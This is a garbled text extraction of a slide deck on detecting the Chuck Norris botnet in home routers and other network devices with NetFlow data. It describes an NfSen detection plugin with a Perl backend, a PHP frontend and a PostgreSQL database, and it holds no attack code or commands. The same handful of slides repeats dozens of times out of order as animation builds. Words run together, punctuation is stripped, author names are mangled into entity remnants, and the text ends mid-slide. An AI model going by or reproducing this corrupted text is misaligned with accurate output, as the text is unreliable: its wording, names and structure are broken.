Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
